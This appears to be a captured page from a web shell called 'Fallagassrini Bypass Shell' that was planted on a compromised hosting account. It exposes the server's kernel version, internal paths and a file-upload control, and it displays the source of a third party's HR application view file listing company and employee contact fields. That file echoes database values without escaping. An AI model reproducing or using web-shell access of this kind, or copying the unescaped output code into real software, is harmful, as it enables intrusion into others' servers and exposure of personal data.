? Fallagassrini

Fallagassrini Bypass Shell

echo"
Fallagassrini
";
Current Path : /home1/savoy/public_html/savoyglobal.net/hr/application/views/Timesheet/

Linux gator3171.hostgator.com 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64
Upload File :
Current File : /home1/savoy/public_html/savoyglobal.net/hr/application/views/Timesheet/single_manpower_hiring.php

<?php
    if ( ! defined('BASEPATH')) exit('No direct script access allowed');
    $this->load->view('documentreadyfunctions');
?>


<div class="select-bar">
    <label><img src="<?=base_url()?>assets/images/backbutton.png" title="Back" class="clickimage" onclick="viewdata('timesheet','viewintimesheetsearch','search_manpower_hiring','view_manpower_hiring','<?=$_SESSION['pagenum'];?>')" alt="Back" align = "center" width="25" height="25"  />
    </label>
    <span class="heading">Company Details</span>
</div>

<fieldset>
    <?php
        $attributes=array('id'=>'validateform','class'=>'customForm');
        echo form_open('',$attributes);
        $trade_list=$this->mastermodel->getdatas('trade','trade_name');
    ?>
    <ul>
        <li>
                <label for="data">Company Name</label>
                <div class="record_entry">
                 <?php
                      echo $viewinfo->company_name;
                 ?>
                </div>
        </li>
        <li>
                <label for="data">Cordinator</label>
                <div class="record_entry">
                 <?php
                      echo $viewinfo->company_cordinator;
                 ?>
                </div>
        </li>
        <li>
                <label for="data">Address</label>
                <div class="record_entry">
                 <?php
                      echo $viewinfo->company_address;
                 ?>
                </div>
        </li>
        <li>
                <label for="data">Po Box</label>
                <div class="record_entry">
                 <?php
                      echo $viewinfo->company_pobox;
                 ?>
                </div>

        </li>
         <li>
                <label for="data">City</label>
                <div class="record_entry">
                 <?php
                      echo $viewinfo->company_city;
                 ?>
                </div>

        </li>
         <li>
                <label for="data">Country</label>
                <div class="record_entry">
                 <?php
                      echo $viewinfo->company_country;
                 ?>
                </div>

        </li>
         <li>
                <label for="data">Email</label>.
                <div class="record_entry">
                 <?php
                      echo $viewinfo->company_email;
                 ?>
                </div>

        </li>
       <li>
                <label for="data">Contact No</label>
                <div class="record_entry">
                 <?php
                      echo $viewinfo->company_contact_no;
                 ?>
                </div>

        </li>
        <li>
            <table class="sort" cellpadding="0" cellspacing="0" width="200px;">
                <tr>
                    <th>Employee No</th>
                    <th>Employee Name</th>
                    <th>Trade</th>
                    <th>Contact No</th>
                   
                </tr>
          <?php
            $employee_list=$this->mastermodel->get_data('payroll_manpower_hiring_employee',$viewinfo->company_id,'manpower_hiring_employee_company_id');
            $i=1;
            foreach ($employee_list as $employee)
            {
          ?>


          <tr>
              <td>
                  
                  <?=$employee['manpower_hiring_employee_no'];?></td>
              <td><?=$employee['manpower_hiring_employee_name'];?></td>
              <td>
                  <?php
                    echo $this->mastermodel->getSingleFieldValue('trade','trade_name','trade_id',$employee['manpower_hiring_employee_trade_id']);
                ?>
              </td>
              <td><?=$employee['manpower_hiring_employee_contact_no'];?></td>
              
            </tr>
            <?php
            $i++;
            }
            ?>
            </table>

        
        </li>

        
    </ul>
<?php echo form_close();?>
</fieldset>

bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net